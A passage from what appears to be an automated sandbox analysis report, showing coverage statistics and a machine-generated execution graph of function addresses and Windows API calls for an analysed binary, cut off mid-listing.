                    • Instruction Fuzzy Hash: 3721E476A14B80CEDB14DF39D89029C3BA4F38478CF64511AEA4987B69CF34C596C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:1598
                    Total number of Limit Nodes:2
                    execution_graph 6472 815f10 6494 80c650 6472->6494 6476 815f64 6514 4111e0 6476->6514 6478 815f79 6479 81602c GetMessageW 6478->6479 6518 436960 6478->6518 6481 816041 6479->6481 6482 81601a 6479->6482 6542 40fec0 6481->6542 6482->6479 6483 815faa 6485 815fba Sleep 6483->6485 6487 436960 4 API calls 6485->6487 6488 815fd3 6487->6488 6488->6479 6489 815fd7 6488->6489 6526 80fc70 6489->6526 6546 40fde0 6494->6546 6496 80c667 6497 80c6ae 6496->6497 6550 411240 6496->6550 6499 4114b0 6497->6499 6500 4114e9 6499->6500 6501 4114cf 6499->6501 6500->6476 6502 4114eb 6501->6502 6503 4114dc 6501->6503 6505 411507 6502->6505 6506 40c4c0 TlsGetValue 6502->6506 6588 410430 6503->6588 6594 4106d0 6505->6594 6506->6505 6510 411538 6513 4106d0 TlsGetValue 6510->6513 6511 411521 6511->6510 6512 4106d0 TlsGetValue 6511->6512 6512->6510 6513->6500 6515 4111f4 6514->6515 6516 4100a0 TlsGetValue 6515->6516 6517 411202 6516->6517 6517->6478 6625 411140 6518->6625 6520 436973 GetFileAttributesW 6521 436989 6520->6521 6522 436a4e GetLastError 6520->6522 6523 4369a6 CreateFileW 6521->6523 6525 436993 6521->6525 6522->6525 6524 4369e1 CloseHandle 6523->6524 6523->6525 6524->6525 6525->6483 6527 80fc91 6526->6527 6627 80c6c0 6527->6627 6530 40fde0 TlsGetValue 6531 80fcd5 6530->6531 6532 815b40 6531->6532 6533 815b5e 6532->6533 6534 815b70 Sleep 6533->6534 6535 815b85 6534->6535 6536 410430 TlsGetValue 6535->6536 6537 815bc4 6536->6537 6859 80f6d0 6537->6859 6540 40fec0 TlsGetValue 6541 815c03 6540->6541 6541->6479 6543 40fee2 6542->6543 6544 40fecf 6542->6544 6544->6543 6545 40fde0 TlsGetValue 6544->6545 6545->6544 6547 40fdf0 6546->6547 6548 40fe19 6546->6548 6547->6548 6554 409120 6547->6554 6548->6496 6551 41124f 6550->6551 6569 4100a0 6551->6569 6555 40912a 6554->6555 6556 40912e 6554->6556 6555->6548 6556->6555 6558 4093f0 6556->6558 6561 409390 6558->6561 6560 409401 6560->6555 6562 4093a8 6561->6562 6564 4093bc 6562->6564 6565 419650 6562->6565 6564->6560 6566 419682 6565->6566 6567 41965d 6565->6567 6566->6564 6567->6566 6568 419672 TlsGetValue 6567->6568 6568->6566 6570 4100bf 6569->6570 6572 4100c6 6569->6572 6575 40fcb0 6570->6575 6573 40fde0 TlsGetValue 6572->6573 6574 4100f4 6573->6574 6574->6497 6576 40fcdc 6575->6576 6577 40fcbd 6575->6577 6576->6572 6578 40fcca 6577->6578 6585 40c4c0 6577->6585 6581 4090f0 6578->6581 6582 4090fa 6581->6582 6583 4090fe 6581->6583 6582->6576 6583->6582 6584 4093f0 TlsGetValue 6583->6584 6584->6582 6586 409390 TlsGetValue 6585->6586 6587 40c4d3 6586->6587 6587->6578 6589 41044b 6588->6589 6593 41045d 6588->6593 6592 40fcb0 TlsGetValue 6589->6592 6589->6593 6590 40fde0 TlsGetValue 6591 410498 6590->6591 6591->6500 6592->6593 6593->6590 6610 410610 6594->6610 6597 4113d0 6598 4113f3 6597->6598 6599 4113e6 6597->6599 6600 411451 6598->6600 6602 411401 6598->6602 6601 40fde0 TlsGetValue 6599->6601 6603 40fcb0 TlsGetValue 6600->6603 6607 4113ee 6601->6607 6604 411416 6602->6604 6605 40c4c0 TlsGetValue 6602->6605 6608 411458 6603->6608 6616 409150 6604->6616 6605->6604 6607->6511 6608->6607 6609 40fde0 TlsGetValue 6608->6609 6609->6607 6611 410662 6610->6611 6612 410625 6610->6612 6611->6597 6612->6611 6613 40fcb0 TlsGetValue 6612->6613 6614 41063a 6613->6614 6615 40fde0 TlsGetValue 6614->6615 6615->6611 6617 40915f 6616->6617 6621 409199 6616->6621 6618 409164 6617->6618 6619 40917e 6617->6619 6620 40917c 6618->6620 6624 4093f0 TlsGetValue 6618->6624 6619->6620 6622 4093f0 TlsGetValue 6619->6622 6620->6607 6621->6620 6623 4093f0 TlsGetValue 6621->6623 6622->6620 6623->6620 6624->6620 6626 41114c 6625->6626 6626->6520 6648 4346d0 6627->6648 6631 80c771 6632 411190 TlsGetValue 6631->6632 6633 80c823 6631->6633 6663 4116b0 6631->6663 6666 435df0 6631->6666 6632->6631 6670 417900 6633->6670 6642 40fec0 TlsGetValue 6643 80c90f 6642->6643 6644 40fde0 TlsGetValue 6643->6644 6645 80c918 6644->6645 6691 40fe30 6645->6691 6649 4346e4 6648->6649 6650 4113d0 TlsGetValue 6649->6650 6651 4346f1 6650->6651 6652 410b90 6651->6652 6653 410bb3 6652->6653 6654 410ba6 6652->6654 6655 410bfd 6653->6655 6657 410bc1 6653->6657 6656 40fe30 TlsGetValue 6654->6656 6695 40fd10 6655->6695 6660 410bae 6656->6660 6659 409150 TlsGetValue 6657->6659 6659->6660 6660->6631 6661 410c07 6661->6660 6662 40fe30 TlsGetValue 6661->6662 6662->6660 6701 410dc0 6663->6701 6667 435e09 6666->6667 6668 435e2c 6667->6668 6712 434200 6667->6712 6668->6631 6671 40fe80 SysFreeString 6670->6671 6672 417924 6671->6672 6683 41799a 6672->6683 6832 411060 6672->6832 6673 40fe80 SysFreeString 6675 4179a4 6673->6675 6684 4112c0 6675->6684 6676 417946 6677 417984 6676->6677 6678 417974 6676->6678 6680 40fe80 SysFreeString 6677->6680 6679 411060 2 API calls 6678->6679 6681 417982 6679->6681 6680->6681 6838 4104f0 6681->6838 6683->6673 6685 4112ce 6684->6685 6686 4100a0 TlsGetValue 6685->6686 6687 4112e8 6686->6687 6688 40fe80 6687->6688 6689 40fe94 SysFreeString 6688->6689 6690 40fea8 6688->6690 6689->6690 6690->6642 6692 40fe40 6691->6692 6693 40fe69 6691->6693 6692->6693 6694 409120 TlsGetValue 6692->6694 6693->6530 6694->6693 6696 40fd20 6695->6696 6700 40fd44 6695->6700 6697 40fd2d 6696->6697 6698 40c4c0 TlsGetValue 6696->6698 6699 4090f0 TlsGetValue 6697->6699 6698->6697 6699->6700 6700->6661 6702 410e39 6701->6702 6703 410ded 6701->6703 6704 410e66 6702->6704 6705 410e3f 6702->6705 6703->6702 6708 40c4c0 TlsGetValue 6703->6708 6707 40fcb0 TlsGetValue 6704->6707 6706 4113d0 TlsGetValue 6705->6706 6710 410e56 6706->6710 6707->6710 6708->6703 6709 410ef0 6709->6631 6710->6709 6711 40fde0 TlsGetValue 6710->6711 6711->6709 6715 440c20 6712->6715 6714 43422a 6714->6668 6716 440c52 6715->6716 6725 417be0 6716->6725 6721 410430 TlsGetValue 6722 440c9c 6721->6722 6723 40fec0 TlsGetValue 6722->6723 6724 440cac 6723->6724 6724->6714 6726 417c0d 6725->6726 6733 417c47 6725->6733 6727 417c17 6726->6727 6728 417c49 6726->6728 6737 413d70 6727->6737 6730 4111e0 TlsGetValue 6728->6730 6730->6733 6731 417c22 6732 4100a0 TlsGetValue 6731->6732 6732->6733 6734 437d50 6733->6734 6792 437d80 6734->6792 6738 413d80 6737->6738 6739 413d9a 6737->6739 6738->6739 6741 413d10 6738->6741 6739->6731 6742 413d26 6741->6742 6743 413d45 6741->6743 6745 415580 GetModuleFileNameW 6742->6745 6743->6739 6746 411240 TlsGetValue 6745->6746 6747 4155d4 6746->6747 6748 4111e0 TlsGetValue 6747->6748 6749 4155e1 6748->6749 6756 415350 6749->6756 6751 4155f2 6752 40fec0 TlsGetValue 6751->6752 6753 415627 6752->6753 6754 40fde0 TlsGetValue 6753->6754 6755 415630 6754->6755 6755->6743 6757 4153b6 6756->6757 6758 40fde0 TlsGetValue 6757->6758 6759 4153cc 6758->6759 6760 41546e 6759->6760 6762 4104b0 TlsGetValue 6759->6762 6761 40fec0 TlsGetValue 6760->6761 6763 41551f 6761->6763 6767 4153ea 6762->6767 6764 40fec0 TlsGetValue 6763->6764 6766 415531 6764->6766 6765 41542c 6768 414f80 14 API calls 6765->6768 6766->6751 6767->6765 6769 4117a0 TlsGetValue 6767->6769 6770 415446 6768->6770 6769->6765 6771 415473 6770->6771 6772 41544d 6770->6772 6775 414710 14 API calls 6771->6775 6773 415110 FindFirstFileW FindClose TlsGetValue 6772->6773 6774 415461 6773->6774 6776 410430 TlsGetValue 6774->6776 6777 415483 6775->6777 6776->6760 6778 415110 FindFirstFileW FindClose TlsGetValue 6777->6778 6779 415497 6778->6779 6780 410430 TlsGetValue 6779->6780 6781 4154a4 6780->6781 6782 4154e8 6781->6782 6783 4154b7 GetSystemDefaultUILanguage 6781->6783 6782->6760 6784 415230 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW TlsGetValue 6782->6784 6785 414710 14 API calls 6783->6785 6786 415502 6784->6786 6787 4154c7 6785->6787 6788 410430 TlsGetValue 6786->6788 6789 415110 FindFirstFileW FindClose TlsGetValue 6787->6789 6788->6760 6790 4154db 6789->6790 6791 410430 TlsGetValue 6790->6791 6791->6782 6795 437dd0 6792->6795 6796 437e15 6795->6796 6798 437e62 6796->6798 6808 437bf0 6796->6808 6799 437eee 6798->6799 6806 437e79 6798->6806 6800 4100a0 TlsGetValue 6799->6800 6802 437d6c 6800->6802 6801 437ee1 6804 4113d0 TlsGetValue 6801->6804 6802->6721 6803 40fde0 TlsGetValue 6803->6806 6804->6802 6805 4113d0 TlsGetValue 6805->6806 6806->6801 6806->6803 6806->6805 6807 437bf0 50 API calls 6806->6807 6807->6806 6811 438220 6808->6811 6812 43829d 6811->6812 6818 438294 6811->6818 6813 40fec0 TlsGetValue 6812->6813 6814 439114 6813->6814 6815 40fde0 TlsGetValue 6814->6815 6816 437c15 6815->6816 6816->6798 6817 411240 TlsGetValue 6817->6818 6818->6812 6818->6817 6819 411190 TlsGetValue 6818->6819 6820 4113b0 TlsGetValue 6818->6820 6821 4111b0 TlsGetValue 6818->6821 6822 411290 TlsGetValue 6818->6822 6823 435980 TlsGetValue 6818->6823 6824 435950 TlsGetValue 6818->6824 6825 4359e0 TlsGetValue 6818->6825 6826 4359c0 TlsGetValue 6818->6826 6827 4381c0 TlsGetValue 6818->6827 6828 437b40 50 API calls 6818->6828 6829 435dd0 18 API calls 6818->6829 6830 435db0 18 API calls 6818->6830 6831 439be0 18 API calls 6818->6831 6819->6818 6820->6818 6821->6818 6822->6818 6823->6818 6824->6818 6825->6818 6826->6818 6827->6818 6828->6818 6829->6818 6830->6818 6831->6818 6833 411072 6832->6833 6837 411079 6832->6837 6848 40fdb0 6833->6848 6852 410c80 6837->6852 6839 4104fc 6838->6839 6844 410506 6838->6844 6840 410501 6839->6840 6841 410508 6839->6841 6842 40fe80 SysFreeString 6840->6842 6843 41051b 6841->6843 6846 410522 6841->6846 6842->6844 6845 40fe80 SysFreeString 6843->6845 6844->6683 6845->6844 6846->6844 6847 40fd90 TlsGetValue 6846->6847 6847->6844 6849 40fdd4 6848->6849 6850 40fdbb 6848->6850 6849->6837 6850->6849 6856 40fd90 6850->6856 6853 410ca3 6852->6853 6854 410c9a 6852->6854 6853->6676 6855 40fe80 SysFreeString 6854->6855 6855->6853 6857 409390 TlsGetValue 6856->6857 6858 40fda3 6857->6858 6858->6849 6860 80f751 6859->6860 6861 410430 TlsGetValue 6860->6861 6862 80f77b 6861->6862 6863 410430 TlsGetValue 6862->6863 6864 80f798 6863->6864 6865 410430 TlsGetValue 6864->6865 6866 80f7b2 6865->6866 6867 410430 TlsGetValue 6866->6867 6868 80f7cf 6867->6868 6869 410430 TlsGetValue 6868->6869 6870 80f7ec 6869->6870 6910 4104b0 6870->6910 6875 4104b0 TlsGetValue 6876 80f825 6875->6876 6918 7f7550 6876->6918 6878 80f833 6922 411580 6878->6922 6883 411580 TlsGetValue 6884 80f883 6883->6884 6951 7f76b0 6884->6951 6890 80f8b5 6891 4111e0 TlsGetValue 6890->6891 6892 80f8da 6891->6892 6893 411580 TlsGetValue 6892->6893 6894 80f8fa 6893->6894 6895 4111e0 TlsGetValue 6894->6895 6896 80f90f 6895->6896 6897 80f918 Sleep 6896->6897 6898 4116b0 TlsGetValue 6897->6898 6899 80f94c 6898->6899 7004 813400 6899->7004 6904 40fec0 TlsGetValue 6905 80f9a1 6904->6905 6906 40fec0 TlsGetValue 6905->6906 6907 80f9b3 6906->6907 6908 40fec0 TlsGetValue 6907->6908 6909 80f9c5 Sleep 6908->6909 6909->6540 6911 4104c5 6910->6911 6912 40fde0 TlsGetValue 6911->6912 6913 4104e0 6912->6913 6914 437200 6913->6914 6915 43721e 6914->6915 7019 448740 6915->7019 6919 7f756a 6918->6919 7026 7fd270 6919->7026 6921 7f7596 6921->6878 6923 4115b0 6922->6923 6924 41159e 6922->6924 6926 4115b8 6923->6926 6927 4115ca 6923->6927 6925 410430 TlsGetValue 6924->6925 6930 4115ab 6925->6930 6931 410430 TlsGetValue 6926->6931 6928 4115d7 6927->6928 6929 4115e9 6927->6929 6932 4114b0 TlsGetValue 6928->6932 6933 4115f2 6929->6933 6934 41167e 6929->6934 6943 80c9f0 6930->6943 6931->6930 6932->6930 6935 411621 6933->6935 6937 40c4c0 TlsGetValue 6933->6937 6936 410430 TlsGetValue 6934->6936 6939 40fcb0 TlsGetValue 6935->6939 6938 41168b 6936->6938 6937->6935 6940 4114b0 TlsGetValue 6938->6940 6941 411628 6939->6941 6940->6930 6942 40fde0 TlsGetValue 6941->6942 6942->6930 6944 80ca1e 6943->6944 7062 511af0 6944->7062 6946 80ca60 7067 5119a0 6946->7067 6948 80cad1 6949 40fec0 TlsGetValue 6948->6949 6950 80caf7 6949->6950 6950->6883 6952 7f78b0 50 API calls 6951->6952 6954 7f76d1 6952->6954 6953 511410 57 API calls 6955 7f773c 6953->6955 6956 440a70 33 API calls 6954->6956 6958 7f76eb 6954->6958 7136 7f77a0 6955->7136 6956->6958 6958->6953 6960 7f8ba0 6961 7f8bb9 6960->6961 6962 7f8be7 6961->6962 6964 440a70 33 API calls 6961->6964 6963 7f8c27 6962->6963 7451 7f8030 6962->7451 6966 7f78b0 6963->6966 6964->6962 6967 411b70 TlsGetValue 6966->6967 6968 7f78d9 6967->6968 6969 411b70 TlsGetValue 6968->6969 6974 7f78ec 6969->6974 6970 7f7e29 6971 460d30 50 API calls 6970->6971 6972 7f7e57 6971->6972 6973 411d20 14 API calls 6972->6973 6975 7f7ec2 6973->6975 6974->6970 6976 45e650 33 API calls 6974->6976 6979 7f7c41 6974->6979 6982 412220 18 API calls 6974->6982 6986 411d20 14 API calls 6974->6986 7000 7f4930 33 API calls 6974->7000 7002 7f48d0 33 API calls 6974->7002 7003 7f4830 46 API calls 6974->7003 6977 411d20 14 API calls 6975->6977 6976->6974 6978 7f7ed5 6977->6978 6978->6890 6980 413390 18 API calls 6979->6980 6981 7f7cea 6979->6981 6980->6981 8320 7f4930 6981->8320 6982->6974 6984 7f7d40 8324 7f48d0 6984->8324 6986->6974 6987 7f7d5c 6988 7f48d0 33 API calls 6987->6988 6989 7f7d78 6988->6989 6990 7f48d0 33 API calls 6989->6990 6991 7f7d94 6990->6991 6992 7f48d0 33 API calls 6991->6992 6993 7f7db0 6992->6993 6994 7f4930 33 API calls 6993->6994 6995 7f7dca 6994->6995 6996 7f4930 33 API calls 6995->6996 6997 7f7de4 6996->6997 6998 7f48d0 33 API calls 6997->6998 6999 7f7e00 6998->6999 6999->6970 8328 7f4830 6999->8328 7000->6974 7002->6974 7003->6974 7005 813421 7004->7005 7006 4116b0 TlsGetValue 7005->7006 7007 813451 7006->7007 7008 40fde0 TlsGetValue 7007->7008 7009 81348d 7008->7009 7010 40fec0 TlsGetValue 7009->7010 7011 80f970 7010->7011 7012 813c90 7011->7012 8334 40ff70 7012->8334 7015 420e80 7016 813cbf Sleep 7015->7016 7017 40fde0 TlsGetValue 7016->7017 7018 80f986 Sleep 7017->7018 7018->6904 7022 4117a0 7019->7022 7023 4117b2 7022->7023 7024 4100a0 TlsGetValue 7023->7024 7025 4117f1 7024->7025 7025->6875 7028 7fd292 7026->7028 7032 801c50 7028->7032 7029 7fd2b6 7035 7fd350 7029->7035 7031 7fd2c5 7031->6921 7039 4d3e50 7032->7039 7034 801c6d 7034->7029 7036 7fd376 7035->7036 7037 801c50 TlsGetValue 7036->7037 7038 7fd404 7036->7038 7037->7038 7038->7031 7040 4d3ea5 7039->7040 7041 4d3e5e 7039->7041 7042 4d3ead 7040->7042 7043 4d3eb3 7040->7043 7044 4d3ea3 7041->7044 7051 4d2750 7041->7051 7045 4d3ecb 7042->7045 7046 4d3eb1 7042->7046 7054 4d2fd0 7043->7054 7044->7034 7048 4093f0 TlsGetValue 7045->7048 7058 4d3040 7046->7058 7048->7044 7052 4090f0 TlsGetValue 7051->7052 7053 4d2766 7052->7053 7053->7044 7055 4d2fdb 7054->7055 7056 4d2fee 7055->7056 7057 4d2750 TlsGetValue 7055->7057 7056->7044 7057->7056 7060 4d304b 7058->7060 7059 4d305e 7059->7044 7060->7059 7061 4d2750 TlsGetValue 7060->7061 7061->7059 7070 511410 7062->7070 7064 511b1b 7074 511aa0 7064->7074 7066 511b2d 7066->6946 7068 511410 57 API calls 7067->7068 7069 5119cc 7068->7069 7069->6948 7071 511433 7070->7071 7078 5114c0 7071->7078 7073 511462 7073->7064 7075 511ab9 7074->7075 7076 511ae5 7075->7076 7126 50f310 7075->7126 7076->7066 7079 511515 7078->7079 7080 511618 7079->7080 7081 51154a 7079->7081 7122 436300 7080->7122 7101 436380 7081->7101 7084 51162b 7086 4374d0 2 API calls 7084->7086 7100 51160b 7084->7100 7085 410430 TlsGetValue 7088 5116c5 7085->7088 7089 51165a GetLastError 7086->7089 7087 51158c 7087->7100 7105 4374d0 7087->7105 7092 40fec0 TlsGetValue 7088->7092 7093 43ea00 3 API calls 7089->7093 7096 5116d5 7092->7096 7094 511679 7093->7094 7097 440c20 50 API calls 7094->7097 7096->7073 7097->7100 7098 5115de 7099 440c20 50 API calls 7098->7099 7099->7100 7100->7085 7102 4363e6 7101->7102 7103 436399 7101->7103 7102->7087 7104 43639e CreateFileW 7103->7104 7104->7102 7106 4374e9 7105->7106 7107 437520 7106->7107 7108 43750f 7106->7108 7110 43751e GetLastError 7107->7110 7111 4113d0 TlsGetValue 7107->7111 7109 4100a0 TlsGetValue 7108->7109 7109->7110 7116 43ea00 7110->7116 7112 43752e 7111->7112 7113 437536 GetFullPathNameW 7112->7113 7114 437556 7113->7114 7114->7110 7115 4113d0 TlsGetValue 7114->7115 7115->7110 7117 43ea32 FormatMessageW 7116->7117 7118 43ea2b 7116->7118 7119 43ea68 7117->7119 7118->7117 7120 4100a0 TlsGetValue 7119->7120 7121 43eaa1 LocalFree 7120->7121 7121->7098 7123 436316 7122->7123 7124 43636e 7122->7124 7123->7124 7125 436328 CreateFileW 7123->7125 7124->7084 7125->7124 7127 50f331 7126->7127 7130 50f351 7127->7130 7132 440a70 7127->7132 7128 50f39d 7128->7076 7130->7128 7131 440a70 33 API calls 7130->7131 7131->7130 7133 440a8e 7132->7133 7134 417be0 33 API calls 7133->7134 7135 440ab2 7134->7135 7135->7130 7137 7f78b0 50 API calls 7136->7137 7138 7f77c1 7137->7138 7139 440a70 33 API calls 7138->7139 7140 7f77dc 7138->7140 7139->7140 7141 440a70 33 API calls 7140->7141 7143 7f7811 7140->7143 7141->7143 7142 7f7753 7142->6960 7143->7142 7145 7f5cf0 7143->7145 7163 411b70 7145->7163 7150 7f603c 7190 411d20 7150->7190 7155 440a70 33 API calls 7158 7f5d61 7155->7158 7156 440a70 33 API calls 7156->7158 7157 7f4790 33 API calls 7157->7158 7158->7150 7158->7156 7158->7157 7159 7f47e0 33 API calls 7158->7159 7160 413390 18 API calls 7158->7160 7161 7f4700 46 API calls 7158->7161 7185 460bc0 7158->7185 7159->7158 7160->7158 7161->7158 7164 411bd0 7163->7164 7165 411b8a 7163->7165 7167 460d30 7164->7167 7165->7164 7196 411be0 7165->7196 7206 4645a0 7167->7206 7172 7f6d70 7173 7f6d9e 7172->7173 7383 413390 7173->7383 7175 413560 14 API calls 7176 7f5d48 7175->7176 7176->7155 7176->7158 7178 7f6de6 7179 7f6f62 7178->7179 7184 7f6fda 7178->7184 7386 7f4700 7178->7386 7180 7f6ffa 7179->7180 7182 7f6f8d 7179->7182 7181 413560 14 API calls 7180->7181 7181->7184 7183 413390 18 API calls 7182->7183 7183->7184 7184->7175 7392 462860 7185->7392 7187 460be3 7396 412ac0 7187->7396 7191 411ddf 7190->7191 7192 411d42 7190->7192 7191->7142 7192->7191 7193 411e20 14 API calls 7192->7193 7195 4093f0 TlsGetValue 7192->7195 7404 417420 7192->7404 7193->7192 7195->7192 7197 411bfb 7196->7197 7203 411c4b 7196->7203 7198 411c34 7197->7198 7199 411c12 7197->7199 7200 411cbc 7197->7200 7201 4093f0 TlsGetValue 7198->7201 7198->7203 7199->7198 7199->7203 7204 411c32 7199->7204 7202 411b70 TlsGetValue 7200->7202 7200->7203 7201->7203 7202->7200 7203->7165 7203->7203 7204->7203 7205 411be0 TlsGetValue 7204->7205 7205->7204 7207 4645b0 7206->7207 7208 4645c5 7206->7208 7209 440a70 33 API calls 7207->7209 7210 4645f4 7208->7210 7211 464360 18 API calls 7208->7211 7209->7208 7212 460d42 7210->7212 7217 461740 7210->7217 7211->7210 7214 464360 7212->7214 7256 412f60 7214->7256 7218 46176e 7217->7218 7219 440a70 33 API calls 7218->7219 7220 4617b3 7218->7220 7219->7220 7221 46181f 7220->7221 7222 4090f0 TlsGetValue 7220->7222 7229 4619a3 7220->7229 7223 4619a5 7221->7223 7224 46196c 7221->7224 7222->7221 7226 412ae0 14 API calls 7223->7226 7230 412ae0 7224->7230 7226->7229 7228 409120 TlsGetValue 7228->7229 7229->7212 7233 411e20 7230->7233 7232 412ae9 7232->7228 7234 411e40 7233->7234 7240 411eb4 7233->7240 7235 411e81 7234->7235 7236 411e4d 7234->7236 7235->7240 7241 411e9b 7235->7241 7250 411f60 7235->7250 7237 411e57 7236->7237 7252 411f21 7236->7252 7238 411e60 7237->7238 7239 411eaa 7237->7239 7238->7240 7244 411e72 7238->7244 7249 411ed7 7238->7249 7243 40fef0 TlsGetValue 7239->7243 7240->7232 7242 411f7a 7241->7242 7245 411ea8 7241->7245 7247 4093f0 TlsGetValue 7242->7247 7243->7240 7244->7242 7254 411e7f 7244->7254 7251 40fec0 TlsGetValue 7245->7251 7246 413560 14 API calls 7246->7250 7247->7240 7248 411d20 14 API calls 7248->7252 7249->7240 7253 411df0 TlsGetValue 7249->7253 7250->7240 7250->7246 7251->7240 7252->7240 7252->7248 7253->7249 7254->7240 7255 411e20 14 API calls 7254->7255 7255->7254 7257 412faf 7256->7257 7262 412fd5 7256->7262 7258 412fbd 7257->7258 7259 4093f0 TlsGetValue 7257->7259 7293 413560 7258->7293 7259->7258 7261 412fd0 7261->7150 7261->7172 7263 413057 7262->7263 7265 4093f0 TlsGetValue 7262->7265 7264 41306a 7263->7264 7266 4093f0 TlsGetValue 7263->7266 7267 41307f 7264->7267 7268 4131a9 7264->7268 7265->7263 7266->7264 7269 413092 7267->7269 7270 41318f 7267->7270 7271 4090f0 TlsGetValue 7268->7271 7299 412f00 7269->7299 7273 409150 TlsGetValue 7270->7273 7274 4131b2 7271->7274 7277 41314a 7273->7277 7281 41320f 7274->7281 7320 412750 7274->7320 7276 41314c 7278 413180 7276->7278 7280 412ae0 14 API calls 7276->7280 7277->7261 7286 412f60 18 API calls 7277->7286 7282 409150 TlsGetValue 7278->7282 7279 4130a3 7283 4090f0 TlsGetValue 7279->7283 7280->7278 7285 413560 14 API calls 7281->7285 7282->7277 7287 4130c8 7283->7287 7285->7277 7286->7277 7287->7277 7309 412920 7287->7309 7289 41310d 7290 413141 7289->7290 7291 412ae0 14 API calls 7289->7291 7292 409120 TlsGetValue 7290->7292 7291->7290 7292->7277 7294 4135d2 7293->7294 7296 413574 7293->7296 7294->7261 7295 4135c6 7297 409120 TlsGetValue 7295->7297 7296->7294 7296->7295 7298 411e20 14 API calls 7296->7298 7297->7294 7298->7295 7300 419650 TlsGetValue 7299->7300 7301 412f0e 7300->7301 7302 412f17 7301->7302 7303 412f26 7301->7303 7304 419650 TlsGetValue 7302->7304 7306 419650 TlsGetValue 7303->7306 7305 412f1c 7304->7305 7305->7276 7305->7279 7307 412f36 7306->7307 7308 419650 TlsGetValue 7307->7308 7308->7305 7310 412940 7309->7310 7315 412980 7309->7315 7311 412982 7310->7311 7312 41294d 7310->7312 7313 412957 7311->7313 7314 412a2e 7311->7314 7312->7313 7319 4129f8 7312->7319 7313->7315 7318 4093f0 TlsGetValue 7313->7318 7314->7315 7346 4124e0 7314->7346 7315->7289 7316 412920 18 API calls 7316->7319 7318->7315 7319->7315 7319->7316 7321 412770 7320->7321 7329 412801 7320->7329 7322 41277d 7321->7322 7323 4127bc 7321->7323 7324 412787 7322->7324 7330 41289f 7322->7330 7326 4127d6 7323->7326 7328 4128eb 7323->7328 7323->7329 7325 412790 7324->7325 7333 4127e5 7324->7333 7327 41279d 7325->7327 7335 412806 7325->7335 7331 4127e3 7326->7331 7332 41290c 7326->7332 7336 4127aa 7327->7336 7337 412848 7327->7337 7328->7329 7376 4135e0 7328->7376 7329->7281 7330->7329 7364 412220 7330->7364 7331->7329 7342 410430 TlsGetValue 7331->7342 7338 4093f0 TlsGetValue 7332->7338 7333->7329 7354 410540 7333->7354 7335->7329 7341 4104f0 2 API calls 7335->7341 7336->7332 7344 4127b7 7336->7344 7337->7329 7360 4121f0 7337->7360 7338->7329 7341->7335 7342->7331 7344->7329 7345 412750 18 API calls 7344->7345 7345->7344 7347 412715 7346->7347 7348 412516 7346->7348 7347->7314 7348->7347 7349 412920 18 API calls 7348->7349 7350 4124e0 18 API calls 7348->7350 7351 4093f0 TlsGetValue 7348->7351 7352 417460 18 API calls 7348->7352 7353 417420 14 API calls 7348->7353 7349->7348 7350->7348 7351->7348 7352->7348 7353->7348 7355 41055b 7354->7355 7359 410575 7354->7359 7357 40fd10 TlsGetValue 7355->7357 7355->7359 7356 40fe30 TlsGetValue 7358 4105b2 7356->7358 7357->7359 7358->7333 7359->7356 7361 412206 7360->7361 7362 4121fe 7360->7362 7363 4093f0 TlsGetValue 7361->7363 7362->7337 7363->7362 7365 41249d 7364->7365 7371 412256 7364->7371 7365->7330 7366 412220 18 API calls 7366->7371 7367 4135e0 18 API calls 7367->7371 7368 410540 TlsGetValue 7368->7371 7369 417460 18 API calls 7369->7371 7370 4093f0 TlsGetValue 7370->7371 7371->7365 7371->7366 7371->7367 7371->7368 7371->7369 7371->7370 7372 4104f0 SysFreeString TlsGetValue 7371->7372 7373 410430 TlsGetValue 7371->7373 7374 4121f0 TlsGetValue 7371->7374 7375 412750 18 API calls 7371->7375 7372->7371 7373->7371 7374->7371 7375->7371 7377 4135f5 7376->7377 7378 41360b 7376->7378 7377->7378 7379 4135fb 7377->7379 7382 413560 14 API calls 7378->7382 7380 4133d0 18 API calls 7379->7380 7381 413609 7380->7381 7381->7328 7382->7381 7384 412f60 18 API calls 7383->7384 7385 4133c1 7384->7385 7385->7178 7387 7f471d 7386->7387 7388 7f474b 7387->7388 7389 440a70 33 API calls 7387->7389 7390 413560 14 API calls 7388->7390 7389->7388 7391 7f4768 7390->7391 7391->7178 7393 462877 7392->7393 7394 46288d 7393->7394 7400 462810 7393->7400 7394->7187 7397 412ac9 7396->7397 7398 412ace 7396->7398 7399 412750 18 API calls 7397->7399 7398->7158 7399->7398 7402 46282e 7400->7402 7401 464360 18 API calls 7403 462856 7401->7403 7402->7401 7403->7394 7405 417453 7404->7405 7406 417432 7404->7406 7405->7192 7410 40cf00 7406->7410 7419 4159e0 7410->7419 7412 40cf2a 7423 40ced0 7412->7423 7415 4173c0 7416 4173e4 7415->7416 7417 4173c9 7415->7417 7416->7405 7427 416ef0 7417->7427 7420 415a03 7419->7420 7421 4159f9 7419->7421 7420->7421 7422 409390 TlsGetValue 7420->7422 7421->7412 7422->7421 7424 40cef5 7423->7424 7425 40cee1 7423->7425 7424->7415 7425->7424 7426 409390 TlsGetValue 7425->7426 7426->7424 7428 416fb3 7427->7428 7429 416f19 7427->7429 7428->7416 7435 4169e0 7429->7435 7431 416f57 7439 416a90 7431->7439 7436 4169f9 7435->7436 7437 4169ee 7435->7437 7436->7431 7438 40d960 12 API calls 7437->7438 7438->7436 7440 416aa6 7439->7440 7441 416a9e 7439->7441 7440->7428 7443 416600 7440->7443 7442 40db30 GetCurrentThreadId Sleep TlsGetValue 7441->7442 7442->7440 7444 416390 12 API calls 7443->7444 7446 416642 7444->7446 7445 4166c0 7447 4163b0 GetCurrentThreadId Sleep TlsGetValue 7445->7447 7446->7445 7448 41669f 7446->7448 7449 4166cb 7447->7449 7450 4166e0 GetCurrentThreadId Sleep TlsGetValue 7448->7450 7449->7428 7450->7449 7452 411b70 TlsGetValue 7451->7452 7453 7f80b3 7452->7453 7454 411b70 TlsGetValue 7453->7454 7455 7f80c6 7454->7455 7456 411b70 TlsGetValue 7455->7456 7457 7f80d9 7456->7457 7458 411b70 TlsGetValue 7457->7458 7459 7f80ec 7458->7459 7460 411b70 TlsGetValue 7459->7460 7461 7f80ff 7460->7461 7462 411b70 TlsGetValue 7461->7462 7463 7f8112 7462->7463 7464 411b70 TlsGetValue 7463->7464 7465 7f8125 7464->7465 7466 411d20 14 API calls 7465->7466 7467 7f8139 7466->7467 7597 7f9110 7467->7597 7470 412220 18 API calls 7471 